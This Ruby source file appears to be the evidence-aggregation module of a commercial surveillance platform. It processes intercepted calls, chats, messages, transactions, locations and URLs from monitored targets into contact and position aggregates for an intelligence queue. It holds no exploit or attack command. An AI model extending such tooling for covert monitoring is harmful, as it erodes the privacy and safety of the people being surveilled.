# # Aggregator processing module # # the evidence to be processed are queued by the workers # require 'rcs-common/trace' require 'rcs-common/fixnum' require 'rcs-common/sanitize' require 'rcs-common/systemstatus' require 'fileutils' require_relative 'peer' require_relative 'position' require_relative 'virtual' require_relative 'money' module RCS module Aggregator class Processor extend RCS::Tracer include SystemStatusMixin def self.run # check if we are the last shard and enable the position aggregation # we use this technique to avoid conflicts between multiple positioner enable_position = RCS::DB::Shard.last == RCS::DB::Config.instance.global['SHARD'] types = AggregatorQueue::AGGREGATOR_TYPES types.delete('position') unless enable_position # infinite processing loop loop do # get the first entry from the queue and mark it as processed to avoid # conflicts with multiple processors if (queued = AggregatorQueue.get_queued(types)) entry = queued.first count = queued.last change_status(:ok, "Aggregating #{count} evidence in queue") trace :info, "#{count} evidence to be processed in queue" process entry else change_status(:ok, "Idle") sleep 1 end end rescue Interrupt trace :info, "System shutdown. Bye bye!" return 0 rescue Exception => e trace :error, "Thread error: #{e.message}" trace :fatal, "EXCEPTION: [#{e.class}] " << e.backtrace.join("\n") retry end def self.process(entry) ev = Evidence.target(entry['target_id']).find(entry['evidence_id']) target = Item.find(entry['target_id']) trace :info, "Processing #{ev.type} evidence for target #{target.name.inspect}" # extract peer(s) from call, mail, chat, sms data = extract_data(entry['target_id'], ev) data.each do |datum| # already exist? # update # else # create new one type = datum[:type] # we need to find a document that is in the same day, same type and that have the same peer and versus # if not found, create a new entry, otherwise increment the number of occurrences params = {aid: ev.aid, day: Time.at(datum[:time]).getutc.strftime('%Y%m%d'), type: type, ev_type: ev.type} case type when :position params.merge!({data: {position: datum[:point]}}) agg = aggregate_position(datum, entry, params) when :url params.merge!({data: {host: datum[:host]}}) agg = aggregate_virtual(datum, entry, params) else params.merge!({data: {peer: datum[:peer], versus: datum[:versus], sender: datum[:sender]}}) agg = aggregate_peer(datum, entry, params) end trace :info, "Aggregated #{target.name}: #{agg.day} #{agg.type} #{agg.count} #{agg.data.inspect}" end rescue Exception => e puts e.backtrace.join("\n") trace :error, "Cannot process evidence: #{e.message}" trace :fatal, e.backtrace.join("\n") end def self.check_intelligence_license LicenseManager.instance.check :intelligence end def self.aggregate_position(datum, entry, params) # find similar point or create a new one agg = PositionAggregator.find_similar_or_create_by(entry['target_id'], params.reject { |key| key == :ev_type }) # add the timeframe to the aggregate agg.add_to_set(info: datum[:timeframe]) # we have to alert the intelligence for every new timeframe saved in the aggregate agg.add_to_intelligence_queue if check_intelligence_license agg.inc(count: 1) agg end def self.aggregate_peer(datum, entry, params) # pass the peer to the Frequencer to check if a new suggested entity has to be created if params[:ev_type] != 'money' and check_intelligence_license PeerAggregator.create_suggested_peer(entry['target_id'], params) end # find the existing aggregate or create a new one agg = Aggregate.target(entry['target_id']).find_or_create_by(params.reject { |key| key == :ev_type }) # if it's new, add the entry to the handle book and notify the intelligence if agg.count == 0 HandleBook.insert_or_update(params[:type], datum[:peer], entry['target_id']) agg.add_to_intelligence_queue if check_intelligence_license end # we are sure we have the object persisted in the db # so we have to perform an atomic operation because we have multiple aggregator working concurrently agg.inc(count: 1) # sum up the duration (or size) agg.inc(size: datum[:size]) return agg end def self.aggregate_virtual(datum, entry, unique_filter) aggregate_class = Aggregate.target(entry['target_id']) agg = aggregate_class.find_or_create_by(unique_filter.reject { |key| key == :ev_type }) agg.inc(count: 1) agg end def self.extract_data(target_id, ev) data = [] case ev.type when 'money' data += MoneyAggregator.extract_tx(ev) when 'call' data += PeerAggregator.extract_call(ev) when 'chat' data += PeerAggregator.extract_chat(ev) when 'message' data += PeerAggregator.extract_message(ev) when 'position' data += PositionAggregator.extract(target_id, ev) if check_intelligence_license when 'url' data += VirtualAggregator.extract(ev) if check_intelligence_license end return data end end end #OCR:: end #RCS:: .